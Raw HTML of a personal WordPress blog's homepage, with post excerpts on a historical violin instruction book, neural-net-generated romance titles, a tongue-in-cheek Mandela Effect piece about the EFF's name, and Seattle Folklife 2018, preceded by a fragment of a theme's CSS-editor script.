$liveIframe = tdcAdminIFrameUI.getLiveIframe(); if ( $liveIframe.length ) { $liveIframe.load(function() { $liveIframe.contents().find( 'body').append( '<textarea class="tdw-css-writer-editor" style="display: none"></textarea>' ); }); } } }); })(jQuery);</script> <textarea class="tdw-css-writer-editor td_live_css_uid_1_5cdd48262dc52"></textarea><div id="td_live_css_uid_1_5cdd48262dc52" class="td-code-editor"></div> <script>jQuery(window).load(function (){ if ( 'undefined' !== typeof tdLiveCssInject ) { tdLiveCssInject.init(); var editor_textarea = jQuery('.td_live_css_uid_1_5cdd48262dc52'); var languageTools = ace.require("ace/ext/language_tools"); var tdcCompleter = { getCompletions: function (editor, session, pos, prefix, callback) { if (prefix.length === 0) { callback(null, []); return } if ('undefined' !== typeof tdcAdminIFrameUI) { var data = { error: undefined, getShortcode: '' }; tdcIFrameData.getShortcodeFromData(data); if (!_.isUndefined(data.error)) { tdcDebug.log(data.error); } if (!_.isUndefined(data.getShortcode)) { var regex = /el_class=\"([A-Za-z0-9_-]*\s*)+\"/g, results = data.getShortcode.match(regex); var elClasses = {}; for (var i = 0; i < results.length; i++) { var currentClasses = results[i] .replace('el_class="', '') .replace('"', '') .split(' '); for (var j = 0; j < currentClasses.length; j++) { if (_.isUndefined(elClasses[currentClasses[j]])) { elClasses[currentClasses[j]] = ''; } } } var arrElClasses = []; for (var prop in elClasses) { arrElClasses.push(prop); } callback(null, arrElClasses.map(function (item) { return { name: item, value: item, meta: 'in_page' } })); } } } }; languageTools.addCompleter(tdcCompleter); window.editor = ace.edit("td_live_css_uid_1_5cdd48262dc52"); window.editor.$blockScrolling = Infinity; // 'change' handler is written as function because it's called by tdc_on_add_css_live_components (of wp_footer hook) // We did it to reattach the existing compiled css to the new content received from server. window.editorChangeHandler = function () { //tdwState.lessWasEdited = true; window.onbeforeunload = function () { if (tdwState.lessWasEdited) { return "You have attempted to leave this page. Are you sure?"; } return false; }; var editorValue = editor.getSession().getValue(); editor_textarea.val(editorValue); if ('undefined' !== typeof tdcAdminIFrameUI) { tdcAdminIFrameUI.getLiveIframe().contents().find('.tdw-css-writer-editor:first').val(editorValue); // Mark the content as modified // This is important for showing info when composer closes tdcMain.setContentModified(); } tdLiveCssInject.less(); }; editor.getSession().setValue(editor_textarea.val()); editor.getSession().on('change', editorChangeHandler); editor.setTheme("ace/theme/textmate"); editor.setShowPrintMargin(false); editor.getSession().setMode("ace/mode/less"); editor.getSession().setUseWrapMode(true); editor.setOptions({ enableBasicAutocompletion: true, enableSnippets: true, enableLiveAutocompletion: false }); } });</script> </div></div><footer> <a href="#" class="tdw-save-css">Save</a><div class="tdw-more-info-text">Write CSS OR LESS and hit save. CTRL + SPACE for auto-complete.</div><div class="tdw-resize"></div></footer></div></body></html>
0
<!DOCTYPE html> <html lang="en-US" class="no-js"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="profile" href="http://gmpg.org/xfn/11"> <script>(function(html){html.className = html.className.replace(/\bno-js\b/,'js')})(document.documentElement);</script> <title>Communications From Elsewhere &#8211; Home of RJL20</title> <link rel='dns-prefetch' href='//s0.wp.com' /> <link rel='dns-prefetch' href='//secure.gravatar.com' /> <link rel='dns-prefetch' href='//fonts.googleapis.com' /> <link rel='dns-prefetch' href='//s.w.org' /> <link href='https://fonts.gstatic.com' crossorigin rel='preconnect' /> <link rel="alternate" type="application/rss+xml" title="Communications From Elsewhere &raquo; Feed" href="http://www.elsewhere.org/journal/feed/" /> <link rel="alternate" type="application/rss+xml" title="Communications From Elsewhere &raquo; Comments Feed" href="http://www.elsewhere.org/journal/comments/feed/" /> <script> var MP3jPLAYLISTS = []; var MP3jPLAYERS = []; </script> <!-- This site uses the Google Analytics by MonsterInsights plugin v7.6.0 - Using Analytics tracking - https://www.monsterinsights.com/ --> <script type="text/javascript" data-cfasync="false"> var mi_version = '7.6.0'; var mi_track_user = true; var mi_no_track_reason = ''; var disableStr = 'ga-disable-UA-4076325-1'; /* Function to detect opted out users */ function __gaTrackerIsOptedOut() { return document.cookie.indexOf(disableStr + '=true') > -1; } /* Disable tracking if the opt-out cookie exists. */ if ( __gaTrackerIsOptedOut() ) { window[disableStr] = true; } /* Opt-out function */ function __gaTrackerOptout() { document.cookie = disableStr + '=true; expires=Thu, 31 Dec 2099 23:59:59 UTC; path=/'; window[disableStr] = true; } if ( mi_track_user ) { (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','//www.google-analytics.com/analytics.js','__gaTracker'); __gaTracker('create', 'UA-4076325-1', 'auto'); __gaTracker('set', 'forceSSL', true); __gaTracker('send','pageview'); } else { console.log( "" ); (function() { /* https://developers.google.com/analytics/devguides/collection/analyticsjs/ */ var noopfn = function() { return null; }; var noopnullfn = function() { return null; }; var Tracker = function() { return null; }; var p = Tracker.prototype; p.get = noopfn; p.set = noopfn; p.send = noopfn; var __gaTracker = function() { var len = arguments.length; if ( len === 0 ) { return; } var f = arguments[len-1]; if ( typeof f !== 'object' || f === null || typeof f.hitCallback !== 'function' ) { console.log( 'Not running function __gaTracker(' + arguments[0] + " ....) because you are not being tracked. " + mi_no_track_reason ); return; } try { f.hitCallback(); } catch (ex) { } }; __gaTracker.create = function() { return new Tracker(); }; __gaTracker.getByName = noopnullfn; __gaTracker.getAll = function() { return []; }; __gaTracker.remove = noopfn; window['__gaTracker'] = __gaTracker; })(); } </script> <!-- / Google Analytics by MonsterInsights --> <script type="text/javascript"> window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/www.elsewhere.org\/journal\/wp-includes\/js\/wp-emoji-release.min.js?ver=5.2"}}; !function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55357,56424,55356,57342,8205,55358,56605,8205,55357,56424,55356,57340],[55357,56424,55356,57342,8203,55358,56605,8203,55357,56424,55356,57340]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings); </script> <style type="text/css"> img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 .07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; } </style> <link rel='stylesheet' id='shadowbox-css-css' href='http://www.elsewhere.org/journal/wp-content/uploads/shadowbox-js/src/shadowbox.css?ver=3.0.3' type='text/css' media='screen' /> <link rel='stylesheet' id='shadowbox-extras-css' href='http://www.elsewhere.org/journal/wp-content/plugins/shadowbox-js/css/extras.css?ver=3.0.3.10' type='text/css' media='screen' /> <link rel='stylesheet' id='mci-footnotes-css-public-css' href='http://www.elsewhere.org/journal/wp-content/plugins/footnotes/class/../css/public.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='twentysixteen-jetpack-css' href='http://www.elsewhere.org/journal/wp-content/plugins/jetpack/modules/theme-tools/compat/twentysixteen.css?ver=7.3.1' type='text/css' media='all' /> <link rel='stylesheet' id='wp-block-library-css' href='http://www.elsewhere.org/journal/wp-includes/css/dist/block-library/style.min.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='wp-block-library-theme-css' href='http://www.elsewhere.org/journal/wp-includes/css/dist/block-library/theme.min.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='parent-style-css' href='http://www.elsewhere.org/journal/wp-content/themes/twentysixteen/style.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='child-style-css' href='http://www.elsewhere.org/journal/wp-content/themes/twentysixteen-child/style.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='twentysixteen-fonts-css' href='https://fonts.googleapis.com/css?family=Merriweather%3A400%2C700%2C900%2C400italic%2C700italic%2C900italic%7CMontserrat%3A400%2C700%7CInconsolata%3A400&#038;subset=latin%2Clatin-ext' type='text/css' media='all' /> <link rel='stylesheet' id='genericons-css' href='http://www.elsewhere.org/journal/wp-content/plugins/jetpack/_inc/genericons/genericons/genericons.css?ver=3.1' type='text/css' media='all' /> <link rel='stylesheet' id='twentysixteen-style-css' href='http://www.elsewhere.org/journal/wp-content/themes/twentysixteen-child/style.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='twentysixteen-block-style-css' href='http://www.elsewhere.org/journal/wp-content/themes/twentysixteen/css/blocks.css?ver=20181230' type='text/css' media='all' /> <!--[if lt IE 10]> <link rel='stylesheet' id='twentysixteen-ie-css' href='http://www.elsewhere.org/journal/wp-content/themes/twentysixteen/css/ie.css?ver=20160816' type='text/css' media='all' /> <![endif]--> <!--[if lt IE 9]> <link rel='stylesheet' id='twentysixteen-ie8-css' href='http://www.elsewhere.org/journal/wp-content/themes/twentysixteen/css/ie8.css?ver=20160816' type='text/css' media='all' /> <![endif]--> <!--[if lt IE 8]> <link rel='stylesheet' id='twentysixteen-ie7-css' href='http://www.elsewhere.org/journal/wp-content/themes/twentysixteen/css/ie7.css?ver=20160816' type='text/css' media='all' /> <![endif]--> <link rel='stylesheet' id='mp3-jplayer-css' href='http://www.elsewhere.org/journal/wp-content/plugins/mp3-jplayer/css/v1-skins/v1-silver.css?ver=2.7.3' type='text/css' media='all' /> <link rel='stylesheet' id='jetpack_css-css' href='http://www.elsewhere.org/journal/wp-content/plugins/jetpack/css/jetpack.css?ver=7.3.1' type='text/css' media='all' /> <script type='text/javascript' src='http://www.elsewhere.org/journal/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script> <script type='text/javascript' src='http://www.elsewhere.org/journal/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script> <script type='text/javascript' src='http://www.elsewhere.org/journal/wp-content/plugins/footnotes/class/../js/jquery.tools.min.js?ver=5.2'></script> <script type='text/javascript'> /* <![CDATA[ */ var monsterinsights_frontend = {"js_events_tracking":"true","download_extensions":"doc,exe,js,pdf,ppt,tgz,zip,xls","inbound_paths":"[]","home_url":"http:\/\/www.elsewhere.org\/journal","hash_tracking":"false"}; /* ]]> */ </script> <script type='text/javascript' src='http://www.elsewhere.org/journal/wp-content/plugins/google-analytics-for-wordpress/assets/js/frontend.min.js?ver=7.6.0'></script> <!--[if lt IE 9]> <script type='text/javascript' src='http://www.elsewhere.org/journal/wp-content/themes/twentysixteen/js/html5.js?ver=3.7.3'></script> <![endif]--> <link rel='https://api.w.org/' href='http://www.elsewhere.org/journal/wp-json/' /> <link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://www.elsewhere.org/journal/xmlrpc.php?rsd" /> <link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://www.elsewhere.org/journal/wp-includes/wlwmanifest.xml" /> <meta name="generator" content="WordPress 5.2" /> <link rel='shortlink' href='https://wp.me/4L22D' /> <link rel='dns-prefetch' href='//v0.wordpress.com'/> <style type="text/css">.recentcomments a{display:inline !important;padding:0 !important;margin:0 !important;}</style> <!-- Jetpack Open Graph Tags --> <meta property="og:type" content="website" /> <meta property="og:title" content="Communications From Elsewhere" /> <meta property="og:description" content="Home of RJL20" /> <meta property="og:url" content="http://www.elsewhere.org/journal/" /> <meta property="og:site_name" content="Communications From Elsewhere" /> <meta property="og:image" content="https://s0.wp.com/i/blank.jpg" /> <meta property="og:locale" content="en_US" /> <!-- End Jetpack Open Graph Tags --> <style type="text/css" id="wp-custom-css"> /* You can add your own CSS here. Click the help icon above to learn more. */ .footnote_plugin_text { text-indent: 1.25em; } .footnote_plugin_link { padding-left: 1em; } </style> <style type="text/css" media="screen"> .footnote_tooltip { z-index: 9999; } .footnote_plugin_tooltip_text { top: .5em !important; }.footnote_tooltip { display: none; padding: 12px; font-size: 13px; background-color: #fff7a7; border-width: 1px; border-style: solid; border-color: #cccc99; border-radius: 3px; -webkit-box-shadow: 2px 2px 11px #666666; -moz-box-shadow: 2px 2px 11px #666666; box-shadow: 2px 2px 11px #666666;} </style> </head> <body class="home blog wp-embed-responsive group-blog hfeed"> <div id="page" class="site"> <div class="site-inner"> <a class="skip-link screen-reader-text" href="#content">Skip to content</a> <header id="masthead" class="site-header" role="banner"> <div class="site-header-main"> <div class="site-branding"> <h1 class="site-title"><a href="http://www.elsewhere.org/journal/" rel="home">Communications From Elsewhere</a></h1> <p class="site-description">Home of RJL20</p> </div><!-- .site-branding --> <button id="menu-toggle" class="menu-toggle">Menu</button> <div id="site-header-menu" class="site-header-menu"> <nav id="site-navigation" class="main-navigation" role="navigation" aria-label="Primary Menu"> <div class="menu-menu-1-container"><ul id="menu-menu-1" class="primary-menu"><li id="menu-item-2667" class="menu-item menu-item-type-custom menu-item-object-custom current-menu-item current_page_item menu-item-home menu-item-2667"><a href="http://www.elsewhere.org/journal/" aria-current="page">Home</a></li> <li id="menu-item-2678" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-2678"><a href="https://www.facebook.com/rjl20">Facebook</a></li> <li id="menu-item-2679" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-2679"><a href="https://twitter.com/rjl20">Twitter</a></li> </ul></div> </nav><!-- .main-navigation --> </div><!-- .site-header-menu --> </div><!-- .site-header-main --> </header><!-- .site-header --> <div id="content" class="site-content"> <div id="primary" class="content-area"> <main id="main" class="site-main" role="main"> <article id="post-3399" class="post-3399 post type-post status-publish format-standard has-post-thumbnail hentry category-general"> <header class="entry-header"> <h2 class="entry-title"><a href="http://www.elsewhere.org/journal/archives/2019/05/15/saunders-violin-instructor/" rel="bookmark">A New and Scientific Self-Instructing School for the Violin, On an Entirely Different Method from Any Work of the Kind Heretofore Offered to the Public in This Country</a></h2> </header><!-- .entry-header --> <a class="post-thumbnail" href="http://www.elsewhere.org/journal/archives/2019/05/15/saunders-violin-instructor/" aria-hidden="true"> <img width="1200" height="1109" src="http://www.elsewhere.org/journal/wp-content/uploads/2019/05/cover.jpg" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="A New and Scientific Self-Instructing School for the Violin, On an Entirely Different Method from Any Work of the Kind Heretofore Offered to the Public in This Country" sizes="(max-width: 709px) 85vw, (max-width: 909px) 67vw, (max-width: 984px) 60vw, (max-width: 1362px) 62vw, 840px" /> </a> <div class="entry-content"> <h2>Intended for Beginners, Amateurs, Business Players, and Teachers. In Three Parts, Complete in One.</h2> <h3>By George Saunders, Professor of Music and Dancing</h3> <p>On a recent episode of <a rel="noreferrer noopener" aria-label="Get Up in the Cool (opens in a new tab)" href="http://getupinthecool.com" target="_blank">Get Up in the Cool</a>, I heard a neat tune called &#8220;Nickerson&#8217;s Reel&#8221;. It&#8217;s kind of a mix of &#8220;Possum up a Gum Stump&#8221; and &#8220;Year of Jubilo&#8221;, and apparently it comes from the book named in the title of this post. I did a quick search for the book, and I couldn&#8217;t find an easily downloadable version, so I made one, thanks to the <a rel="noreferrer noopener" aria-label="Digital Library of South Dakota (opens in a new tab)" href="https://explore.digitalsd.org/digital/collection/mahoney/id/1458/" target="_blank">Digital Library of South Dakota</a>.</p> <p>You can <a rel="noreferrer noopener" aria-label="download it here (opens in a new tab)" href="https://drive.google.com/open?id=18pC0e832ozjtXa6oRWR0FrCDPiWUceYm" target="_blank">download it here</a>, if you want.</p> <p>I like the tune, and although it&#8217;s got <a rel="noreferrer noopener" aria-label="a listing (opens in a new tab)" href="https://tunearch.org/wiki/Nickerson%27s_Reel" target="_blank">a listing</a> in the Traditional Tune Archive, they don&#8217;t list any recorded sources for it. I can&#8217;t find anybody playing it on Youtube, or any references at AllMusic either. Is this one of those tunes that nobody would be playing any more if it hadn&#8217;t been written down? Maybe there&#8217;s some value in notation after all&#8230;</p> </div><!-- .entry-content --> <footer class="entry-footer"> <span class="byline"><span class="author vcard"><img alt='' src='http://1.gravatar.com/avatar/aae892785877397de782a1936354a167?s=49&#038;d=identicon&#038;r=r' srcset='http://1.gravatar.com/avatar/aae892785877397de782a1936354a167?s=98&#038;d=identicon&#038;r=r 2x' class='avatar avatar-49 photo' height='49' width='49' /><span class="screen-reader-text">Author </span> <a class="url fn n" href="http://www.elsewhere.org/journal/archives/author/josh/">Josh</a></span></span><span class="posted-on"><span class="screen-reader-text">Posted on </span><a href="http://www.elsewhere.org/journal/archives/2019/05/15/saunders-violin-instructor/" rel="bookmark"><time class="entry-date published" datetime="2019-05-15T00:36:18-07:00">2019/05/15</time><time class="updated" datetime="2019-05-15T00:44:48-07:00">2019/05/15</time></a></span><span class="cat-links"><span class="screen-reader-text">Categories </span><a href="http://www.elsewhere.org/journal/category/general/" rel="category tag">General</a></span><span class="comments-link"><a href="http://www.elsewhere.org/journal/archives/2019/05/15/saunders-violin-instructor/#respond">Leave a comment<span class="screen-reader-text"> on A New and Scientific Self-Instructing School for the Violin, On an Entirely Different Method from Any Work of the Kind Heretofore Offered to the Public in This Country</span></a></span> </footer><!-- .entry-footer --> </article><!-- #post-3399 --> <article id="post-3386" class="post-3386 post type-post status-publish format-standard hentry category-misc tag-neural-net tag-text-generator"> <header class="entry-header"> <h2 class="entry-title"><a href="http://www.elsewhere.org/journal/archives/2018/10/30/neural-net-romance-book-titles/" rel="bookmark">Neural Net Romance Book Titles</a></h2> </header><!-- .entry-header --> <div class="entry-content"> <p>Again inspired by <a href="http://aiweirdness.com/" target="_blank" rel="noopener">Janelle Shane</a>, I trained a recurrent neural net on 30,000 romance titles available in ebook form from my public libraries, the <a href="https://kcls.overdrive.com/search?subject=26&amp;subject=77&amp;sortBy=newlyadded" target="_blank" rel="noopener">King County Library System</a> and the <a href="https://spl.overdrive.com/search?subject=26&amp;subject=77&amp;sortBy=newlyadded" target="_blank" rel="noopener">Seattle Public Library</a>. I used <a href="https://www.kevinhooke.com/2018/04/08/generating-tweets-using-a-recurrent-neural-net-torch-rnn/" target="_blank" rel="noopener">these instructions</a> to put together the torch-rnn installation and process the data set, and I have to admit I don&#8217;t understand how any of that works. I might take a look at <a href="https://github.com/minimaxir/textgenrnn" target="_blank" rel="noopener">textgenrnn</a>, next. I don&#8217;t understand it, either, but it looks like it comes with a little more understandable documentation.</p> <p>In any case, here are romance book titles, straight out of the program, with no manual filtering on my part. &#8220;Temperature&#8221; is a setting for, I think, how similar the output is to the input, with lower numbers being more similar to the original and higher numbers being more &#8220;creative&#8221;. It&#8217;s also available as a <a href="https://botsin.space/@Trivelino" target="_blank" rel="noopener">Mastodon bot</a>.<br /> <a href="http://www.elsewhere.org/journal/archives/2018/10/30/neural-net-romance-book-titles/#more-3386" class="more-link">Continue reading<span class="screen-reader-text"> &#8220;Neural Net Romance Book Titles&#8221;</span></a></p> </div><!-- .entry-content --> <footer class="entry-footer"> <span class="byline"><span class="author vcard"><img alt='' src='http://1.gravatar.com/avatar/aae892785877397de782a1936354a167?s=49&#038;d=identicon&#038;r=r' srcset='http://1.gravatar.com/avatar/aae892785877397de782a1936354a167?s=98&#038;d=identicon&#038;r=r 2x' class='avatar avatar-49 photo' height='49' width='49' /><span class="screen-reader-text">Author </span> <a class="url fn n" href="http://www.elsewhere.org/journal/archives/author/josh/">Josh</a></span></span><span class="posted-on"><span class="screen-reader-text">Posted on </span><a href="http://www.elsewhere.org/journal/archives/2018/10/30/neural-net-romance-book-titles/" rel="bookmark"><time class="entry-date published" datetime="2018-10-30T16:05:53-07:00">2018/10/30</time><time class="updated" datetime="2018-11-06T19:31:06-07:00">2018/11/06</time></a></span><span class="cat-links"><span class="screen-reader-text">Categories </span><a href="http://www.elsewhere.org/journal/category/misc/" rel="category tag">Uhh...</a></span><span class="tags-links"><span class="screen-reader-text">Tags </span><a href="http://www.elsewhere.org/journal/tag/neural-net/" rel="tag">neural net</a>, <a href="http://www.elsewhere.org/journal/tag/text-generator/" rel="tag">text generator</a></span><span class="comments-link"><a href="http://www.elsewhere.org/journal/archives/2018/10/30/neural-net-romance-book-titles/#respond">Leave a comment<span class="screen-reader-text"> on Neural Net Romance Book Titles</span></a></span> </footer><!-- .entry-footer --> </article><!-- #post-3386 --> <article id="post-3378" class="post-3378 post type-post status-publish format-standard hentry category-misc tag-alternate-history tag-conspiracy tag-parastalgia"> <header class="entry-header"> <h2 class="entry-title"><a href="http://www.elsewhere.org/journal/archives/2018/09/07/the-mandela-effect-and-the-eff/" rel="bookmark">The Mandela Effect and the EFF</a></h2> </header><!-- .entry-header --> <div class="entry-content"> <p>You know what the <a href="https://mandelaeffect.com/" target="_blank" rel="noopener">Mandela Effect</a> is, right? It&#8217;s the way a lot of people share the same false memory &#8212; whether Nelson Mandela died in prison, say, or whether the name of the book series is the Beren<strong>stein</strong> Bears or the Beren<strong>stain</strong> Bears. Some people use this as evidence that we&#8217;re living in a computer simulation which has some glitches, or that we&#8217;re living in an alternate reality split off from the one they remember from before.</p> <p>Here&#8217;s one that just occurred to me, as I saw yet another person refer to the <a href="https://www.eff.org/" target="_blank" rel="noopener">EFF</a> as the Electronic Freedom Foundation and get immediately corrected &#8212; it&#8217;s the Electronic <em>Frontier</em> Foundation, and always has been.</p> <p>Except &#8230; had it always been the Electronic Frontier Foundation a few years ago? Or is that a more recent development? Has the past been changing on us? I definitely remember it being the Electronic Freedom Foundation at one point in its early history and then changing its name, something that most definitely did not happen in this timeline. But there are echoes of the timeline I remember, if you look.</p> <p>Take the <a href="http://www.sjgames.com/SS/eff-creation.html" target="_blank" rel="noopener">press release announcing the formation of the EFF</a>, archived by Steve Jackson Games, one of the entities responsible for its formation: &#8220;ELECTRONIC FRONTIER FOUNDATION INTRODUCED IN WASHINGTON 7-10-90&#8221; Pretty unambiguous, that. But what&#8217;s this, partway down the page?</p> <blockquote><p>Kapor repeatedly emphasized that the Electronic <span style="background: #ffff00;"><strong>Freedom</strong></span> Foundation isn&#8217;t a &#8220;hackers defense fund.&#8221; &#8220;Unauthorized intrusion into computer systems is improper behavior and should be illegal,&#8221; he declared. EFF&#8217;s purpose is to see that First Amendment rights aren&#8217;t trampled in overreaction to real or imaginary threats posed by computer crackers.</p></blockquote> <p>(Emphasis mine.) Huh. What do contemporaneous news reports call it?</p> <p><div id='gallery-1' class='gallery galleryid-3378 gallery-columns-3 gallery-size-thumbnail'><figure class='gallery-item'> <div class='gallery-icon landscape'> <a href='http://www.elsewhere.org/journal/wp-content/uploads/2018/09/Screen-Shot-2018-09-07-at-4.37.18-PM.png' rel='shadowbox[sbalbum-3378];player=img;'><img width="150" height="112" src="http://www.elsewhere.org/journal/wp-content/uploads/2018/09/Screen-Shot-2018-09-07-at-4.37.18-PM.png" class="attachment-thumbnail size-thumbnail" alt="" aria-describedby="gallery-1-3379" /></a> </div> <figcaption class='wp-caption-text gallery-caption' id='gallery-1-3379'> Electronic Freedom Foundation </figcaption></figure><figure class='gallery-item'> <div class='gallery-icon landscape'> <a href='http://www.elsewhere.org/journal/wp-content/uploads/2018/09/Screen-Shot-2018-09-07-at-4.36.40-PM.png' rel='shadowbox[sbalbum-3378];player=img;'><img width="150" height="108" src="http://www.elsewhere.org/journal/wp-content/uploads/2018/09/Screen-Shot-2018-09-07-at-4.36.40-PM.png" class="attachment-thumbnail size-thumbnail" alt="" aria-describedby="gallery-1-3380" /></a> </div> <figcaption class='wp-caption-text gallery-caption' id='gallery-1-3380'> Electronic Frontier Foundation </figcaption></figure> </div> </p> <p>Ok, mostly they call it the Electronic Frontier Foundation. But not always.</p> <p>Obviously it could be the case that the New York Times and Washington Post and Computerworld just made mistakes in their reporting. It happens. But what if we&#8217;re in a transitional period where the effects of some disruption to the space-time continuum are still rippling? What if that <a href="https://www.npr.org/sections/thetwo-way/2016/04/29/476154494/weasel-shuts-down-world-s-most-powerful-particle-collider" target="_blank" rel="noopener">weasel in the Large Hadron Collider</a> really did split off an alternate reality back in 2016, and the effects of the split haven&#8217;t stabilized yet?</p> <p>I&#8217;ll check back in a couple years and see if history has changed again. Or more likely I won&#8217;t, since if it has, I probably won&#8217;t have made this post or remember having made it.</p> </div><!-- .entry-content --> <footer class="entry-footer"> <span class="byline"><span class="author vcard"><img alt='' src='http://1.gravatar.com/avatar/aae892785877397de782a1936354a167?s=49&#038;d=identicon&#038;r=r' srcset='http://1.gravatar.com/avatar/aae892785877397de782a1936354a167?s=98&#038;d=identicon&#038;r=r 2x' class='avatar avatar-49 photo' height='49' width='49' /><span class="screen-reader-text">Author </span> <a class="url fn n" href="http://www.elsewhere.org/journal/archives/author/josh/">Josh</a></span></span><span class="posted-on"><span class="screen-reader-text">Posted on </span><a href="http://www.elsewhere.org/journal/archives/2018/09/07/the-mandela-effect-and-the-eff/" rel="bookmark"><time class="entry-date published" datetime="2018-09-07T17:03:02-07:00">2018/09/07</time><time class="updated" datetime="2018-09-07T17:09:10-07:00">2018/09/07</time></a></span><span class="cat-links"><span class="screen-reader-text">Categories </span><a href="http://www.elsewhere.org/journal/category/misc/" rel="category tag">Uhh...</a></span><span class="tags-links"><span class="screen-reader-text">Tags </span><a href="http://www.elsewhere.org/journal/tag/alternate-history/" rel="tag">alternate history</a>, <a href="http://www.elsewhere.org/journal/tag/conspiracy/" rel="tag">conspiracy</a>, <a href="http://www.elsewhere.org/journal/tag/parastalgia/" rel="tag">parastalgia</a></span><span class="comments-link"><a href="http://www.elsewhere.org/journal/archives/2018/09/07/the-mandela-effect-and-the-eff/#respond">Leave a comment<span class="screen-reader-text"> on The Mandela Effect and the EFF</span></a></span> </footer><!-- .entry-footer --> </article><!-- #post-3378 --> <article id="post-3355" class="post-3355 post type-post status-publish format-standard hentry category-general tag-folklife"> <header class="entry-header"> <h2 class="entry-title"><a href="http://www.elsewhere.org/journal/archives/2018/05/27/folklife-2018-thoughts/" rel="bookmark">Folklife 2018 Thoughts</a></h2> </header><!-- .entry-header --> <div class="entry-content"> <p>I&#8217;ll start off with my favorite Folklife moment in years:</p> <div class="jetpack-video-wrapper"><span class="embed-youtube" style="text-align:center; display: block;"><iframe class='youtube-player' type='text/html' width='840' height='473' src='https://www.youtube.com/embed/yMpgQ4Z07Dk?version=3&#038;rel=1&#038;fs=1&#038;autohide=2&#038;showsearch=0&#038;showinfo=1&#038;iv_load_policy=1&#038;wmode=transparent' allowfullscreen='true' style='border:0;'></iframe></span></div> <p>I was in the beer garden in hospitality this afternoon, and there was a large fiddle tune circle set up in half of one of the larger tents. The tent was set up with benches such that it was divided in two, and in the other half of the tent some latin percussionists were hanging out. One of them had a pair of bongos that he&#8217;d been playing along to the fiddle tunes with, quietly enough that I don&#8217;t think any of the fiddlers could hear him. I was standing between the two halves of the tent, though, and it sounded great. After a few tunes, someone else from the band came with congas, and those were much more audible. Some of the fiddlers got up from their seats and came over to the percussion half of the tent, and everyone jammed on this tune, and it was great. I think the only other time I&#8217;ve seen something like that happen since John Ross (who ran the band scramble) died was when a couple of busking bands combined forces, and even then, they were both kind of americana jug band-y groups. <a href="http://www.elsewhere.org/journal/archives/2018/05/27/folklife-2018-thoughts/#more-3355" class="more-link">Continue reading<span class="screen-reader-text"> &#8220;Folklife 2018 Thoughts&#8221;</span></a></p> </div><!-- .entry-content --> <footer class="entry-footer"> <span class="byline"><span class="author vcard"><img alt='' src='http://1.gravatar.com/avatar/aae892785877397de782a1936354a167?s=49&#038;d=identicon&#038;r=r' srcset='http://1.gravatar.com/avatar/aae892785877397de782a1936354a167?s=98&#038;d=identicon&#038;r=r 2x' class='avatar avatar-49 photo' height='49' width='49' /><span class="screen-reader-text">Author </span> <a class="url fn n" href="http://www.elsewhere.org/journal/archives/author/josh/">Josh</a></span></span><span class="posted-on"><span class="screen-reader-text">Posted on </span><a href="http://www.elsewhere.org/journal/archives/2018/05/27/folklife-2018-thoughts/" rel="bookmark"><time class="entry-date published" datetime="2018-05-27T20:02:36-07:00">2018/05/27</time><time class="updated" datetime="2018-06-02T17:25:12-07:00">2018/06/02</time></a></span><span class="cat-links"><span class="screen-reader-text">Categories </span><a href="http://www.elsewhere.org/journal/category/general/" rel="category tag">General</a></span><span class="tags-links"><span class="screen-reader-text">Tags </span><a href="http://www.elsewhere.org/journal/tag/folklife/" 